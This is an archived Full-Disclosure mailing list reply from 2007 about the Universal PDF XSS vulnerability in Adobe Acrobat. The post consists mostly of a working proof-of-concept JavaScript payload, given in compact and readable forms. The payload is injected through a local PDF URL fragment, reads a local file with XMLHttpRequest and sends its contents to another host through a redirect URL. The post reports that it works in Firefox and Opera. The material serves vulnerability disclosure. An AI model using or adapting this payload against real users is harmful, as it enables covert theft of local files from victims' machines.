lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Thu, 4 Jan 2007 11:03:44 -0500
From: "T Biehn" <tbiehn@...il.com>
To: Full-Disclosure@...ts.grok.org.uk
Subject: Re: Universal PDF XSS After Party

file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(
xhr.responseText);window.location = "
http://localhost:80/whatever.htm?content=" +
xhr.responseText;}};xhr.open('GET',
'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);xhr.send(null); <- sends a local file to a remote location.

Readable:
function cXHR(){ //Grabs a legit XHR.
    try{
        return new ActiveXObject('Msxml2.XMLHTTP');
    }catch(e){}
    try{
        return new ActiveXObject('Microsoft.XMLHTTP');
    }catch(e){}
    try{
        return new XMLHttpRequest();
    }catch(e){}
    return null;
}
var xhr = cXHR(); //For grabbing
xhr.onreadystatechange = function(){
    if (xhr.readyState == 4){
        alert(xhr.responseText);
        window.location = "http://localhost:80/whatever.htm?content=" +
xhr.responseText;
    }
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);
xhr.send(null);

Works in FFOX / Opera, not in IE.

On 1/4/07, pdp (architect) <pdp.gnucitizen@...glemail.com> wrote:
>
> Everybody knows about it. Everybody talks about it. We had a nice
> party. It is time for estimating the damages. In this article I will
> try to show the impact of the Universal PDF XSS vulnerability by
> explaining how it can be used in real life situations.
>
> http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ